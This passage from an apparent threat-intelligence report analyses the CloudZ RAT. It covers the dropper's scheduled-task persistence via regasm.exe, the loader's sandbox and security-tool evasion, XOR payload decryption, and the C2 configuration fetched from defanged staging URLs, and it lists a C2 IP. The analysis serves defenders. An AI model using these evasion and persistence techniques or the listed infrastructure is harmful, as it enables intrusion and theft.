<p>The dropper executes&#xA0;an embedded PowerShell script&#xA0;to&#xA0;establish&#xA0;persistence&#xA0;on the victim machine&#xA0;through a Windows task&#xA0;which&#xA0;executes the dropped malicious&#xA0;.NET&#xA0;loader.&#xA0;The PowerShell script achieves it by initially performing&#xA0;a runtime check to&#xA0;determine&#xA0;whether the dropped&#xA0;.NET&#xA0;loader is already active on the system. It queries all running processes using the&#xA0;<code>Get-CimInstance Win32_Process</code> command and filters for any instance of&#xA0;<code>regasm.exe</code>&#xA0;with the&#xA0;command line&#xA0;parameters that&#xA0;include&#xA0;the string&#xA0;<code>update.txt</code>. If such an instance is found, the script silently exits without taking any action.&#xA0;</p><p>If the check&#xA0;indicates&#xA0;that the&#xA0;.NET&#xA0;loader is not running, the script proceeds to&#xA0;establish&#xA0;persistence by creating a scheduled task named&#xA0;<code>SystemWindowsApis</code>&#xA0;in the scheduled task folder&#xA0;<code>\Microsoft\Windows\</code>. It configures the task to trigger at system startup&#xA0;<code>/sc onstart</code>, execute under the SYSTEM account&#xA0;<code>/ru SYSTEM</code> with the highest privilege level&#xA0;<code>/rl HIGHEST</code>, and the&#xA0;<code>/f </code>flag ensures it will silently overwrite any existing task with the same name, allowing the malware to update its persistence mechanism. The script configures the task scheduler action to run the&#xA0;.NET&#xA0;loader by&#xA0;utilizing&#xA0;the living-off-the-land binary (LOLBin)&#xA0;regasm.exe,&#xA0;which is the&#xA0;.NET&#xA0;Framework Assembly Registration Utility&#xA0;located&#xA0;at&#xA0;&#x201C;C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\&#x201D;.&#xA0;It provides the path of the dropped&#xA0;.NET&#xA0;loader as the argument to regasm.exe with the&#xA0;<code>/nologo</code> flag. After creating the task, the script&#xA0;immediately&#xA0;triggers it with&#xA0;<code>schtasks /run</code>,&#xA0;ensuring it executes&#xA0;immediately&#xA0;and survives future reboots.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-4b8aab16-162b-4fa6-80a4-1e6de336e095.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="172" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-4b8aab16-162b-4fa6-80a4-1e6de336e095.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-4b8aab16-162b-4fa6-80a4-1e6de336e095.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 2. Excerpt of the PowerShell script to&#xA0;establish&#xA0;persistence&#xA0;on victim&#xA0;machines.&#xA0;</span></figcaption></figure><h2 id="net-loader-implants-the-cloudz-rat">.NET loader implants the&#xA0;CloudZ&#xA0;RAT&#xA0;</h2><p>Talos&#xA0;found that&#xA0;the&#xA0;attacker embedded&#xA0;CloudZ,&#xA0;an encrypted .NET-compiled RAT,&#xA0;in the .NET loader executable.&#xA0;</p><p>When the .NET loader is triggered through the Windows task scheduler, it performs the detection evasion checks beginning with a&#xA0;timing-based&#xA0;evasion check, where it calculates the actual elapsed time of a sleep command to detect if it is executed in&#xA0;the analysis&#xA0;environment. It then performs enumeration of running processes in the victim machine against a list of security tools,&#xA0;including network sniffers like Wireshark and Fiddler, as well as&#xA0;system monitors like&#xA0;Procmon&#xA0;and Sysmon.&#xA0;The .NET loader&#xA0;exits&#xA0;the execution if&#xA0;these&#xA0;are detected in the victim environment.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-ab8d36d3-1cf4-40a8-88c2-afb90311d328-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="597" height="569"><figcaption><span style="white-space: pre-wrap;">Figure 3. Excerpt of the .NET loader binary with&#xA0;detection&#xA0;evasion instructions. </span></figcaption></figure><p>The loader then&#xA0;conducts&#xA0;hardware&#xA0;and environment&#xA0;checks to&#xA0;identify&#xA0;virtual&#xA0;machine&#xA0;(VM) or sandbox characteristics. It verifies that the system has at least two processor cores and searches for strings like &#x201C;VIRTUAL&#x201D; or &#x201C;SANDBOX&#x201D; within the system directory path, computer name, user domain, and the current victim username.&#xA0;&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-4f181cb2-c6a4-4778-bea0-3f9aba4f0171-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="479" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-4f181cb2-c6a4-4778-bea0-3f9aba4f0171-1.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-4f181cb2-c6a4-4778-bea0-3f9aba4f0171-1.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 4. Excerpt of the .NET loader binary with&#xA0;detection&#xA0;evasion instructions.&#xA0;</span></figcaption></figure><p>The loader executable is embedded with multiple chunks of the hexadecimal strings in the binary,&#xA0;which are concatenated sequentially during the&#xA0;execution, reassembling a massive hexadecimal data blob. The loader converts the hexadecimal strings to bytes and performs bytewise XOR decryption using the key hexadecimal (0xCA). If the decrypted payload is a .NET assembly, the loader will&#xA0;reflectively run. Otherwise, it writes the decrypted payload to the folder&#xA0;&#x201C;%TEMP%\{GUID}&#x201D;&#xA0;and runs it as a process.&#xA0;&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-7b576885-e278-4995-b620-cfcd70ddc7b6-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="468" height="369"><figcaption><span style="white-space: pre-wrap;">Figure 5. Excerpt of the .NET loader to execute the .NET payload module.&#xA0;</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-175f3759-73a7-4a14-a04e-e6a9e89681bd-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="472" height="330"><figcaption><span style="white-space: pre-wrap;">Figure 6. Excerpt of the .NET loader to execute the&#xA0;non .NET&#xA0;payload executables.&#xA0;</span></figcaption></figure><h2 id="modular-cloudz-rat-delivered-as-payload">Modular&#xA0;CloudZ&#xA0;RAT delivered as payload&#xA0;</h2><p>Talos discovered&#xA0;that&#xA0;a&#xA0;CloudZ, a modular RAT,&#xA0;is delivered as the payload in the current intrusion.&#xA0;CloudZ&#xA0;is a .NET executable&#xA0;compiled on Jan.&#xA0;13,&#xA0;2026, and is obfuscated with&#xA0;ConfuserEx&#xA0;obfuscation.&#xA0;&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-7330e287-bcbc-40c7-9a30-0dea576c83ec-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="365" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-7330e287-bcbc-40c7-9a30-0dea576c83ec-1.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-7330e287-bcbc-40c7-9a30-0dea576c83ec-1.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 7. The RAT binary&#xA0;shows&#xA0;the malware name,&#xA0;CloudZ.&#xA0;</span></figcaption></figure><p>CloudZ&#xA0;employs layers of defense against&#xA0;the&#xA0;analysis&#xA0;environments and reverse engineering.&#xA0;It queries the&#xA0;<code>_ENABLE_PROFILING</code>&#xA0;environment variable via&#xA0;<code>GetEnvironmentVariable</code>&#xA0;Windows API to detect whether a .NET profiler or debugger is attached to the&#xA0;RAT&#xA0;process&#xA0;on the victim machine.&#xA0;It uses the .NET method &#x201C;System.Reflection.Emit.DynamicMethod&#x201D; combined with &#x201C;ILGenerator&#x201D;&#xA0;method&#xA0;to create the executable&#xA0;functions&#xA0;dynamically during the RAT execution.&#xA0;</p><p>The operation of&#xA0;CloudZ&#xA0;utilizes its configuration data, which is embedded in the binary, as a resource that it decrypts and loads into memory during execution. The decrypted configuration data includes various C2 commands, PowerShell scripts for data&#xA0;archive&#xA0;extraction, multiple file download methods, paths and names of staging folders, multiple HTTP headers, and the URLs of the staging servers.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-9bfc77e6-7f39-42a7-8943-01e13b712c99-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="337" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-9bfc77e6-7f39-42a7-8943-01e13b712c99-1.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-9bfc77e6-7f39-42a7-8943-01e13b712c99-1.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;7.&#xA0;CloudZ&#xA0;primary configuration data decrypted in memory.&#xA0;</span></figcaption></figure><p>After the decryption of the configuration&#xA0;data,&#xA0;CloudZ&#xA0;decodes the&#xA0;Base64-encoded strings to get the&#xA0;URL of the&#xA0;staging&#xA0;server&#xA0;where the&#xA0;secondary configuration is&#xA0;stored.&#xA0;&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-d3405fc7-ff79-4036-8ad6-e378133308cf-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="590" height="334"><figcaption><span style="white-space: pre-wrap;">Figure 8.&#xA0;CloudZ&#xA0;function that downloads the&#xA0;secondary configuration data from the staging server.&#xA0;</span></figcaption></figure><p>Talos&#xA0;found that the RAT&#xA0;downloads and processes secondary configuration data through the URLs &#x201C;hxxps[://]round-cherry-4418[.]hellohiall[.]workers[.]dev/?t=1773406370&#x201D; or&#xA0;&quot;https[://]pastebin[.]com/raw/8pYAgF0Z?t=1771833517&quot;&#xA0;and extracts&#xA0;the C2 server IP address&#xA0;&#x201C;185[.]196[.]10[.]136&#x201D;&#xA0;and port number 8089, establishing connections through TCP sockets.&#xA0;</p><p>Pivoting on the Pastebin&#xA0;URL&#xA0;indicator, we found that the attacker used&#xA0;the Pastebin handler name &#x201C;HELLOHIALL&#x201D;&#xA0;and&#xA0;hosted the secondary configuration data at several Pastebin URLs.&#xA0;&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-e4aef1e1-50b1-47dd-9e39-101e32c835ca.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="173" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-e4aef1e1-50b1-47dd-9e39-101e32c835ca.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-e4aef1e1-50b1-47dd-9e39-101e32c835ca.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 9. Attacker-controlled&#xA0;Pastebin&#xA0;hosting the secondary configuration data. </span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-284a4025-8da9-4b3e-9fc1-9e4c258e1e0d.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="238" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-284a4025-8da9-4b3e-9fc1-9e4c258e1e0d.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-284a4025-8da9-4b3e-9fc1-9e4c258e1e0d.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 10. Attacker&#x2019;s&#xA0;Pastebin&#xA0;account&#xA0;hosting&#xA0;multiple nodes&#xA0;of secondary&#xA0;configuration data.&#xA0;</span></figcaption></figure><p>The RAT rotates between three hardcoded&#xA0;user-agent strings to blend its HTTP traffic with the legitimate browser requests&#xA0;of the victim machine. Every HTTP request includes anti-caching headers consisting of &#x201C;Cache-Control: no-cache, no-store, must-revalidate&quot;, &#x201C;Pragma: no-cache&quot;, and &#x201C;Expires: 0&#x201D;, which prevents intermediate proxies and CDN infrastructure from caching C2&#xA0;or the&#xA0;staging server&#xA0;details.&#xA0;&#xA0;</p><p>User-agent headers used by the&#xA0;CloudZ&#xA0;are:&#xA0;</p><ul><li>Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0&#xA0;</li><li>Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1&#xA0;</li><li>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36&#xA0;</li></ul><p>After the RAT&#xA0;establishes&#xA0;the C2 connection, it enters the command dispatcher module that relies on a decrypted&#xA0;configuration&#xA0;data loaded into memory. The configuration data&#xA0;contains&#xA0;Base64-encoded command&#xA0;identifiers&#xA0;which the RAT&#xA0;matches&#xA0;against&#xA0;the commands received from the C2 server to perform the&#xA0;several&#xA0;functionalities. The commands&#xA0;facilitated&#xA0;by&#xA0;CloudZ&#xA0;are&#xA0;shown in the table&#xA0;below:&#xA0;</p>
<!--kg-card-begin: html-->
<table class="Table Ltr TableWordWrap SCXW93055062 BCX4" border="1" dir="ltr" data-tablestyle="MsoTableGrid" data-tablelook="1696" aria-rowcount="19" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; table-layout: fixed; width: 1px; border-collapse: collapse; empty-cells: show; position: relative; overflow: visible; background: none; border-spacing: 0px;"><tbody class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text;"><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="1" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstRow FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="274226022" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{73}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><b>Base64</b></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">-e</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><b>ncoded command</b></span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="FirstRow SCXW93055062 BCX4" role="columnheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1532171558" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{84}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><b>Decoded command</b></span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="FirstRow LastCol SCXW93055062 BCX4" role="columnheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1225610095" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{91}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><b>Purpose</b></span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="2" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1905263850" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{99}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">cG9uZw==</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="472400457" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{106}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">pong</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="756197888" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{113}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Heartbeat response</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="3" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="515883790" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{121}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">UElORyE</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, 